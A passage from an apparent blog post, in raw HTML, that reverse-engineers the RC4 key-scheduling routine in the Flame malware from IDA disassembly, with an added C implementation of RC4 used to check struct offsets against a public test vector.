<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small; white-space: pre;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Then we can see another clear sign of RC4: </span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1002599C</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h], dl </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100259A2</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">101</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">h], dl</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">It obviously refers to:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">state->index1 = </span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0</span></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">; </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">state->index2 = </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0; </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Putting these lines together we recognize the RC4 "state" structure being set up by the "rc4_init" function. You may also notice that the "rc4_crypt" function follows in the next lines, probably because the code was simply copied from a source similar to the one we are referring to.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">We also know that the prototype of the "rc4_init" function is:</span><br />
<span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">rc4_init(</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">struct</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> rc4_state *</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">const</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> state, </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">const</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> u_char *key, </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> keylen);</span></span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><div style="font-family: Times; font: normal normal normal 11px/normal Menlo; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">But in the assembly code we see only two parameters:</span></div>
</div>
</span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><br />
</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Menlo; font-size: small;"><span class="Apple-style-span" style="font-size: 11px;"></span></span></span></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: Menlo; font-size: small;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025986</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> arg_0 = dword ptr </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">8</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025986</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> arg_4 = dword ptr </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Ch</span></span></div>
<div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">This is weird! It means that one of them is missing: why? For the moment let's just say that the answer is related to the intricate nature of the code, which I will clarify later.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
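<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">As an added example (not code from the post, from Flame or from the CrySyS report), here is an RC4 implementation laid out like the FreeBSD rc4.c the post compares against. It assumes that struct layout and the public RC4 test vector key "Key" / plaintext "Plaintext", and it lets you check that index1 and index2 sit at offsets 0x100 and 0x101, exactly where the two byte stores above write.</span><br />

```c
/* Added example, not code from the post or from Flame: RC4 with the
 * FreeBSD rc4.c state layout (perm[256], index1, index2), so the offsets
 * and loop bounds seen in the disassembly can be checked directly.
 * Assumptions: that struct layout and the public test vector
 * key "Key" / plaintext "Plaintext" -> BB F3 16 E8 D9 40 AF 0A D3. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef unsigned char u_char;

struct rc4_state {
    u_char perm[256];   /* permutation box: the 0x100-byte array filled by the first loop */
    u_char index1;      /* offset 0x100: the "mov [ecx+100h], dl" store */
    u_char index2;      /* offset 0x101: the "mov [ecx+101h], dl" store */
};

static void swap_bytes(u_char *a, u_char *b)
{
    u_char t = *a;
    *a = *b;
    *b = t;
}

/* Key scheduling: same prototype as the rc4_init the post quotes. */
void rc4_init(struct rc4_state *const state, const u_char *key, int keylen)
{
    u_char j;
    int i;

    /* identity permutation: "mov [eax+ecx], al / inc eax / cmp eax, 100h / jl" */
    for (i = 0; i < 256; i++)
        state->perm[i] = (u_char)i;
    state->index1 = 0;
    state->index2 = 0;

    /* mix in the key; key[i % keylen] is the only byte read from the key,
     * and the modulo is the only division in the routine */
    for (j = i = 0; i < 256; i++) {
        j += state->perm[i] + key[i % keylen];
        swap_bytes(&state->perm[i], &state->perm[j]);
    }
}

/* Keystream generation XORed over the buffer; the same call decrypts. */
void rc4_crypt(struct rc4_state *const state, const u_char *inbuf,
               u_char *outbuf, int buflen)
{
    u_char j;
    int i;

    for (i = 0; i < buflen; i++) {
        state->index1++;
        state->index2 += state->perm[state->index1];
        swap_bytes(&state->perm[state->index1], &state->perm[state->index2]);
        j = state->perm[state->index1] + state->perm[state->index2];
        outbuf[i] = inbuf[i] ^ state->perm[j];
    }
}

/* Offsets an analyst expects for the two byte stores after the perm loop. */
size_t rc4_index1_offset(void) { return offsetof(struct rc4_state, index1); }
size_t rc4_index2_offset(void) { return offsetof(struct rc4_state, index2); }

/* Returns 1 if the implementation matches the public test vector
 * (constructed input, unrelated to Flame) and round-trips the plaintext. */
int rc4_check_known_vector(void)
{
    static const u_char key[] = "Key";
    static const u_char plain[] = "Plaintext";
    static const u_char expected[9] = {0xBB, 0xF3, 0x16, 0xE8, 0xD9,
                                       0x40, 0xAF, 0x0A, 0xD3};
    struct rc4_state st;
    u_char out[9];

    rc4_init(&st, key, 3);
    rc4_crypt(&st, plain, out, 9);
    if (memcmp(out, expected, 9) != 0)
        return 0;

    /* decrypting with a freshly keyed state must give the plaintext back */
    rc4_init(&st, key, 3);
    rc4_crypt(&st, out, out, 9);
    return memcmp(out, plain, 9) == 0;
}

int main(void)
{
    int ok = rc4_check_known_vector();
    printf("index1 at 0x%zx, index2 at 0x%zx, test vector %s\n",
           rc4_index1_offset(), rc4_index2_offset(), ok ? "OK" : "FAILED");
    return ok ? 0 : 1;
}
```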
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">First let's look for the code that uses the key. In the C code we have:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">j += state->perm[i] + key[i % keylen];</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We are interested in finding the assembly counterpart of the last addend, <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">key[i % keylen]</span>:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100259DA</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> idiv [ebp+arg_4]</span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This tells us that <i>arg_4</i> is the key length: the only division in the C code is the modulo <i>i % keylen</i>, which the compiler implements with <i>idiv</i>, leaving the remainder in <i>edx</i>. Moreover:</span><br />
<span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100259DD</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> inc [ebp+var_8]</span></span></span><br />
<span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100259E0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> cmp [ebp+var_8], </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h </span></span></span><br />
<span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100259E7</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jl </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">short</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> loc_100259AF</span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, <i>var_8</i> in the assembly code is the counter <i>i</i> of the C code, and to find the key we have to look for an assembly instruction that reads a single byte from memory. This consideration leads us to:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">mov bl, [esi+edi]</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We are therefore interested in <i>edi</i>, which comes from <i>arg_0</i>:</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">100259B2</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov edi, [ebp+arg_0]</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">that is... the key!</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Well, here we are... we found the key... but are we done? Usually the answer would be "yes", but in this case there's more work to do and this is where the code becomes intricate.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: large;"><u>Tracking the key</u></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><div>
<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now we know that the key is passed to the "rc4_init" function as the first argument and we want to track it back to see its content. So, we follow the code using the Cross References and notice that eax corresponds to <i>arg_0</i>, as it is pushed right before the call to "rc4_init":</span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E69F</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call get_key_object</span></span></span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E6A4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> push eax</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E6A5</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> lea ecx, [esi+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">]</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000E6A8</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> call rc4_init</span></span></div>
<br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">What about eax?</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">It comes from the "get_key_object" call, from which we get:</span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C537</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov eax, [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">4</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">]</span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C53A</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> mov eax, [eax+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Ch] </span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C53D</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> add eax, [ecx+</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">8</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">]</span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">1000C540</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> retn</span></span></span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><u>A little remark</u>: as a convention, the C++ "this" pointer is stored in the <i>ecx</i> register. If you are interested in reversing C++ applications you should read <a href="http://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf">this paper</a> as a starting point. More info about the "this" pointer can be found <a href="http://msdn.microsoft.com/en-us/library/y0dddwwd(v=vs.80).aspx">here</a>.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Basically, the code above reads a pointer (first <i>[ecx+4]</i>, then <i>[eax+0Ch]</i>) and adds an index (<i>[ecx+8]</i>) to it, producing the final pointer to the key. In particular, you can picture the object behind <i>ecx</i> as a "memory buffer" object that contains a pointer to the data and an index used to access it.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Something like this:</span></span><br />
